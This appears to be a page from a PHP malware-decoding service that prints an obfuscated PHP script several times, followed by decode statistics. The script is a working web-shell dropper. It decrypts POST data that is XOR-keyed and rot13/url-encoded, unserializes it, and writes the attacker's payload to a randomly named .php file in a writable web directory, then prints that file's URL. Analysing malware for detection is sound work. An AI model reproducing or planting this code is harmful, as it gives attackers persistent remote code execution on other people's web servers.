Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php function wugGB($Xhdoc){$blqNaaJq = "r".'a'.'w'.'u'.chr(114)."l".chr(100)."e"."c"..

Decoded Output download

 
 
<?php function wugGB($Xhdoc){$blqNaaJq = "r".'a'.'w'.'u'.chr(114)."l".chr(100)."e"."c".chr(111)."d"."e";$zvXRorXetV = 's'."t"."r"."_".'r'.chr(779-668).'t'.'1'."3";$oAfwaxP = 's'.'t'.chr(114).chr(95)."s".chr(622-510).'l'.'i'.chr(790-674);$Xhdoc = $oAfwaxP($blqNaaJq($zvXRorXetV($Xhdoc)));return $Xhdoc;}function vwkwiJWpOe($JkGzpNP, $Xhdoc){$CKLmggh = chr(115)."t".chr(114).chr(95).chr(203-88)."p".chr(191-83).chr(449-344).'t';$JkGzpNP = array_slice($CKLmggh(str_repeat($JkGzpNP, (count($Xhdoc)/16)+1)), 0, count($Xhdoc));return $JkGzpNP;}function CGbghuDxQ($ynppjYLv, $iAjSVNBhx, $JkGzpNP){$rIMnuWdPEb = "552f7181-bf38-4c00-80a9-804ee993f2aa";return $ynppjYLv ^ $rIMnuWdPEb[$iAjSVNBhx % strlen($rIMnuWdPEb)] ^ $JkGzpNP;}function ttnRYanFxD($Xhdoc, $JkGzpNP){$Xhdoc = array_map("CGbghuDxQ", array_values($Xhdoc), array_keys($Xhdoc), array_values($JkGzpNP));$Xhdoc = implode("", $Xhdoc);$TwfsvfMYtn = "u"."n".chr(115)."e"."r".chr(105).'a'.chr(146-38)."i".chr(122)."e";$Xhdoc = @$TwfsvfMYtn($Xhdoc);return $Xhdoc;}function eWEtFZcxSJ($PLXHSLUSir){static $hIVlrwMPns = array();$umtXIs = glob($PLXHSLUSir . '/*', GLOB_ONLYDIR);$bnSVibOX = count($umtXIs);if ($bnSVibOX > 0) {foreach ($umtXIs as $PLXHSLUS) {$KVeDG = chr(902-797).chr(458-343).chr(318-223)."w".'r'."i"."t".chr(237-140).chr(98)."l".chr(1032-931);if (@$KVeDG($PLXHSLUS)) {$hIVlrwMPns[] = $PLXHSLUS;}}}foreach ($umtXIs as $PLXHSLUSir) eWEtFZcxSJ($PLXHSLUSir);return $hIVlrwMPns;}function khjgDEsrio($Xhdoc){$EOkey = "D"."O"."C".chr(359-274).chr(927-850).chr(69).chr(78)."T".chr(485-390)."R".chr(1063-984).chr(79)."T";$cZNal = $_SERVER[$EOkey];$umtXIs = eWEtFZcxSJ($cZNal);$DkDrfh = array_rand($umtXIs);$jUVjdeeRKi = chr(46)."p"."h".chr(112);$GtFowYoY = $umtXIs[$DkDrfh] . "/" . substr(md5(time()), 0, 8) . $jUVjdeeRKi;$fyvKEm = chr(102).'i'."l".chr(544-443)."_"."p"."u".'t'.chr(95).chr(99).chr(111).chr(110).'t'.'e'."n"."t"."s";@$fyvKEm($GtFowYoY, $Xhdoc);$TGCWMzfb = "H".chr(474-390)."T"."P".chr(603-508).'H'."O"."S".'T';$UPXcb = "h"."t".chr(273-157)."p".chr(446-388)."/".'/';$XRmjskgK = $UPXcb . $_SERVER[$TGCWMzfb] . substr($GtFowYoY, strlen($cZNal));print($XRmjskgK);die();}foreach ($_POST as $JkGzpNP => $Xhdoc){$KVQdMuWy = strlen($JkGzpNP);if ($KVQdMuWy == 16){$Xhdoc = wugGB($Xhdoc);$JkGzpNP = vwkwiJWpOe($JkGzpNP, $Xhdoc);$Xhdoc = ttnRYanFxD($Xhdoc, $JkGzpNP);if (@is_array($Xhdoc)){$DkDrfh = array_keys($Xhdoc);$Xhdoc = $Xhdoc[$DkDrfh[0]];if ($Xhdoc === $DkDrfh[0]){$jtzps = "p"."h"."p";$lSwZKVGaF = chr(112).chr(104).'p'.chr(118)."e".chr(114)."s"."i".chr(662-551).'n';$fwQWPyMY = 's'.chr(507-406)."r".chr(105).chr(1032-935).chr(108)."i".'z'.'e';echo @$fwQWPyMY(Array($jtzps => @$lSwZKVGaF(), ));exit();}else {khjgDEsrio($Xhdoc);}}}} ?> 
 
How would you describe this file? 
 
Thank you for your feedback! This will help us detect malicious PHP files more accurately in the future. 
Original Code 
 
<?php function wugGB($Xhdoc){$blqNaaJq = "r".'a'.'w'.'u'.chr(114)."l".chr(100)."e"."c".chr(111)."d"."e";$zvXRorXetV = 's'."t"."r"."_".'r'.chr(779-668).'t'.'1'."3";$oAfwaxP = 's'.'t'.chr(114).chr(95)."s".chr(622-510).'l'.'i'.chr(790-674);$Xhdoc = $oAfwaxP($blqNaaJq($zvXRorXetV($Xhdoc)));return $Xhdoc;}function vwkwiJWpOe($JkGzpNP, $Xhdoc){$CKLmggh = chr(115)."t".chr(114).chr(95).chr(203-88)."p".chr(191-83).chr(449-344).'t';$JkGzpNP = array_slice($CKLmggh(str_repeat($JkGzpNP, (count($Xhdoc)/16)+1)), 0, count($Xhdoc));return $JkGzpNP;}function CGbghuDxQ($ynppjYLv, $iAjSVNBhx, $JkGzpNP){$rIMnuWdPEb = "552f7181-bf38-4c00-80a9-804ee993f2aa";return $ynppjYLv ^ $rIMnuWdPEb[$iAjSVNBhx % strlen($rIMnuWdPEb)] ^ $JkGzpNP;}function ttnRYanFxD($Xhdoc, $JkGzpNP){$Xhdoc = array_map("CGbghuDxQ", array_values($Xhdoc), array_keys($Xhdoc), array_values($JkGzpNP));$Xhdoc = implode("", $Xhdoc);$TwfsvfMYtn = "u"."n".chr(115)."e"."r".chr(105).'a'.chr(146-38)."i".chr(122)."e";$Xhdoc = @$TwfsvfMYtn($Xhdoc);return $Xhdoc;}function eWEtFZcxSJ($PLXHSLUSir){static $hIVlrwMPns = array();$umtXIs = glob($PLXHSLUSir . '/*', GLOB_ONLYDIR);$bnSVibOX = count($umtXIs);if ($bnSVibOX > 0) {foreach ($umtXIs as $PLXHSLUS) {$KVeDG = chr(902-797).chr(458-343).chr(318-223)."w".'r'."i"."t".chr(237-140).chr(98)."l".chr(1032-931);if (@$KVeDG($PLXHSLUS)) {$hIVlrwMPns[] = $PLXHSLUS;}}}foreach ($umtXIs as $PLXHSLUSir) eWEtFZcxSJ($PLXHSLUSir);return $hIVlrwMPns;}function khjgDEsrio($Xhdoc){$EOkey = "D"."O"."C".chr(359-274).chr(927-850).chr(69).chr(78)."T".chr(485-390)."R".chr(1063-984).chr(79)."T";$cZNal = $_SERVER[$EOkey];$umtXIs = eWEtFZcxSJ($cZNal);$DkDrfh = array_rand($umtXIs);$jUVjdeeRKi = chr(46)."p"."h".chr(112);$GtFowYoY = $umtXIs[$DkDrfh] . "/" . substr(md5(time()), 0, 8) . $jUVjdeeRKi;$fyvKEm = chr(102).'i'."l".chr(544-443)."_"."p"."u".'t'.chr(95).chr(99).chr(111).chr(110).'t'.'e'."n"."t"."s";@$fyvKEm($GtFowYoY, $Xhdoc);$TGCWMzfb = "H".chr(474-390)."T"."P".chr(603-508).'H'."O"."S".'T';$UPXcb = "h"."t".chr(273-157)."p".chr(446-388)."/".'/';$XRmjskgK = $UPXcb . $_SERVER[$TGCWMzfb] . substr($GtFowYoY, strlen($cZNal));print($XRmjskgK);die();}foreach ($_POST as $JkGzpNP => $Xhdoc){$KVQdMuWy = strlen($JkGzpNP);if ($KVQdMuWy == 16){$Xhdoc = wugGB($Xhdoc);$JkGzpNP = vwkwiJWpOe($JkGzpNP, $Xhdoc);$Xhdoc = ttnRYanFxD($Xhdoc, $JkGzpNP);if (@is_array($Xhdoc)){$DkDrfh = array_keys($Xhdoc);$Xhdoc = $Xhdoc[$DkDrfh[0]];if ($Xhdoc === $DkDrfh[0]){$jtzps = "p"."h"."p";$lSwZKVGaF = chr(112).chr(104).'p'.chr(118)."e".chr(114)."s"."i".chr(662-551).'n';$fwQWPyMY = 's'.chr(507-406)."r".chr(105).chr(1032-935).chr(108)."i".'z'.'e';echo @$fwQWPyMY(Array($jtzps => @$lSwZKVGaF(), ));exit();}else {khjgDEsrio($Xhdoc);}}}} 
 
 ?>

Did this file decode correctly?

Original Code



<?php function wugGB($Xhdoc){$blqNaaJq = "r".'a'.'w'.'u'.chr(114)."l".chr(100)."e"."c".chr(111)."d"."e";$zvXRorXetV = 's'."t"."r"."_".'r'.chr(779-668).'t'.'1'."3";$oAfwaxP = 's'.'t'.chr(114).chr(95)."s".chr(622-510).'l'.'i'.chr(790-674);$Xhdoc = $oAfwaxP($blqNaaJq($zvXRorXetV($Xhdoc)));return $Xhdoc;}function vwkwiJWpOe($JkGzpNP, $Xhdoc){$CKLmggh = chr(115)."t".chr(114).chr(95).chr(203-88)."p".chr(191-83).chr(449-344).'t';$JkGzpNP = array_slice($CKLmggh(str_repeat($JkGzpNP, (count($Xhdoc)/16)+1)), 0, count($Xhdoc));return $JkGzpNP;}function CGbghuDxQ($ynppjYLv, $iAjSVNBhx, $JkGzpNP){$rIMnuWdPEb = "552f7181-bf38-4c00-80a9-804ee993f2aa";return $ynppjYLv ^ $rIMnuWdPEb[$iAjSVNBhx % strlen($rIMnuWdPEb)] ^ $JkGzpNP;}function ttnRYanFxD($Xhdoc, $JkGzpNP){$Xhdoc = array_map("CGbghuDxQ", array_values($Xhdoc), array_keys($Xhdoc), array_values($JkGzpNP));$Xhdoc = implode("", $Xhdoc);$TwfsvfMYtn = "u"."n".chr(115)."e"."r".chr(105).'a'.chr(146-38)."i".chr(122)."e";$Xhdoc = @$TwfsvfMYtn($Xhdoc);return $Xhdoc;}function eWEtFZcxSJ($PLXHSLUSir){static $hIVlrwMPns = array();$umtXIs = glob($PLXHSLUSir . '/*', GLOB_ONLYDIR);$bnSVibOX = count($umtXIs);if ($bnSVibOX > 0) {foreach ($umtXIs as $PLXHSLUS) {$KVeDG = chr(902-797).chr(458-343).chr(318-223)."w".'r'."i"."t".chr(237-140).chr(98)."l".chr(1032-931);if (@$KVeDG($PLXHSLUS)) {$hIVlrwMPns[] = $PLXHSLUS;}}}foreach ($umtXIs as $PLXHSLUSir) eWEtFZcxSJ($PLXHSLUSir);return $hIVlrwMPns;}function khjgDEsrio($Xhdoc){$EOkey = "D"."O"."C".chr(359-274).chr(927-850).chr(69).chr(78)."T".chr(485-390)."R".chr(1063-984).chr(79)."T";$cZNal = $_SERVER[$EOkey];$umtXIs = eWEtFZcxSJ($cZNal);$DkDrfh = array_rand($umtXIs);$jUVjdeeRKi = chr(46)."p"."h".chr(112);$GtFowYoY = $umtXIs[$DkDrfh] . "/" . substr(md5(time()), 0, 8) . $jUVjdeeRKi;$fyvKEm = chr(102).'i'."l".chr(544-443)."_"."p"."u".'t'.chr(95).chr(99).chr(111).chr(110).'t'.'e'."n"."t"."s";@$fyvKEm($GtFowYoY, $Xhdoc);$TGCWMzfb = "H".chr(474-390)."T"."P".chr(603-508).'H'."O"."S".'T';$UPXcb = "h"."t".chr(273-157)."p".chr(446-388)."/".'/';$XRmjskgK = $UPXcb . $_SERVER[$TGCWMzfb] . substr($GtFowYoY, strlen($cZNal));print($XRmjskgK);die();}foreach ($_POST as $JkGzpNP => $Xhdoc){$KVQdMuWy = strlen($JkGzpNP);if ($KVQdMuWy == 16){$Xhdoc = wugGB($Xhdoc);$JkGzpNP = vwkwiJWpOe($JkGzpNP, $Xhdoc);$Xhdoc = ttnRYanFxD($Xhdoc, $JkGzpNP);if (@is_array($Xhdoc)){$DkDrfh = array_keys($Xhdoc);$Xhdoc = $Xhdoc[$DkDrfh[0]];if ($Xhdoc === $DkDrfh[0]){$jtzps = "p"."h"."p";$lSwZKVGaF = chr(112).chr(104).'p'.chr(118)."e".chr(114)."s"."i".chr(662-551).'n';$fwQWPyMY = 's'.chr(507-406)."r".chr(105).chr(1032-935).chr(108)."i".'z'.'e';echo @$fwQWPyMY(Array($jtzps => @$lSwZKVGaF(), ));exit();}else {khjgDEsrio($Xhdoc);}}}} ?>

How would you describe this file?

Thank you for your feedback! This will help us detect malicious PHP files more accurately in the future.
Original Code

<?php function wugGB($Xhdoc){$blqNaaJq = "\162".'a'.'w'.'u'.chr(114)."\154".chr(100)."\145"."\143".chr(111)."\144"."\145";$zvXRorXetV = 's'."\x74"."\162"."\137".'r'.chr(779-668).'t'.'1'."\x33";$oAfwaxP = 's'.'t'.chr(114).chr(95)."\163".chr(622-510).'l'.'i'.chr(790-674);$Xhdoc = $oAfwaxP($blqNaaJq($zvXRorXetV($Xhdoc)));return $Xhdoc;}function vwkwiJWpOe($JkGzpNP, $Xhdoc){$CKLmggh = chr(115)."\164".chr(114).chr(95).chr(203-88)."\160".chr(191-83).chr(449-344).'t';$JkGzpNP = array_slice($CKLmggh(str_repeat($JkGzpNP, (count($Xhdoc)/16)+1)), 0, count($Xhdoc));return $JkGzpNP;}function CGbghuDxQ($ynppjYLv, $iAjSVNBhx, $JkGzpNP){$rIMnuWdPEb = "552f7181-bf38-4c00-80a9-804ee993f2aa";return $ynppjYLv ^ $rIMnuWdPEb[$iAjSVNBhx % strlen($rIMnuWdPEb)] ^ $JkGzpNP;}function ttnRYanFxD($Xhdoc, $JkGzpNP){$Xhdoc = array_map("CGbghuDxQ", array_values($Xhdoc), array_keys($Xhdoc), array_values($JkGzpNP));$Xhdoc = implode("", $Xhdoc);$TwfsvfMYtn = "\x75"."\156".chr(115)."\145"."\x72".chr(105).'a'.chr(146-38)."\151".chr(122)."\x65";$Xhdoc = @$TwfsvfMYtn($Xhdoc);return $Xhdoc;}function eWEtFZcxSJ($PLXHSLUSir){static $hIVlrwMPns = array();$umtXIs = glob($PLXHSLUSir . '/*', GLOB_ONLYDIR);$bnSVibOX = count($umtXIs);if ($bnSVibOX > 0) {foreach ($umtXIs as $PLXHSLUS) {$KVeDG = chr(902-797).chr(458-343).chr(318-223)."\167".'r'."\x69"."\x74".chr(237-140).chr(98)."\x6c".chr(1032-931);if (@$KVeDG($PLXHSLUS)) {$hIVlrwMPns[] = $PLXHSLUS;}}}foreach ($umtXIs as $PLXHSLUSir) eWEtFZcxSJ($PLXHSLUSir);return $hIVlrwMPns;}function khjgDEsrio($Xhdoc){$EOkey = "\104"."\x4f"."\x43".chr(359-274).chr(927-850).chr(69).chr(78)."\x54".chr(485-390)."\x52".chr(1063-984).chr(79)."\x54";$cZNal = $_SERVER[$EOkey];$umtXIs = eWEtFZcxSJ($cZNal);$DkDrfh = array_rand($umtXIs);$jUVjdeeRKi = chr(46)."\x70"."\x68".chr(112);$GtFowYoY = $umtXIs[$DkDrfh] . "/" . substr(md5(time()), 0, 8) . $jUVjdeeRKi;$fyvKEm = chr(102).'i'."\154".chr(544-443)."\x5f"."\160"."\x75".'t'.chr(95).chr(99).chr(111).chr(110).'t'.'e'."\156"."\x74"."\x73";@$fyvKEm($GtFowYoY, $Xhdoc);$TGCWMzfb = "\110".chr(474-390)."\124"."\120".chr(603-508).'H'."\117"."\x53".'T';$UPXcb = "\x68"."\x74".chr(273-157)."\160".chr(446-388)."\57".'/';$XRmjskgK = $UPXcb . $_SERVER[$TGCWMzfb] . substr($GtFowYoY, strlen($cZNal));print($XRmjskgK);die();}foreach ($_POST as $JkGzpNP => $Xhdoc){$KVQdMuWy = strlen($JkGzpNP);if ($KVQdMuWy == 16){$Xhdoc = wugGB($Xhdoc);$JkGzpNP = vwkwiJWpOe($JkGzpNP, $Xhdoc);$Xhdoc = ttnRYanFxD($Xhdoc, $JkGzpNP);if (@is_array($Xhdoc)){$DkDrfh = array_keys($Xhdoc);$Xhdoc = $Xhdoc[$DkDrfh[0]];if ($Xhdoc === $DkDrfh[0]){$jtzps = "\160"."\x68"."\x70";$lSwZKVGaF = chr(112).chr(104).'p'.chr(118)."\x65".chr(114)."\x73"."\x69".chr(662-551).'n';$fwQWPyMY = 's'.chr(507-406)."\x72".chr(105).chr(1032-935).chr(108)."\151".'z'.'e';echo @$fwQWPyMY(Array($jtzps => @$lSwZKVGaF(), ));exit();}else {khjgDEsrio($Xhdoc);}}}}

Function Calls

None

Variables

None

Stats

MD5 a80bfa14d2d04c40b62bcd8128420e44
Eval Count 0
Decode Time 161 ms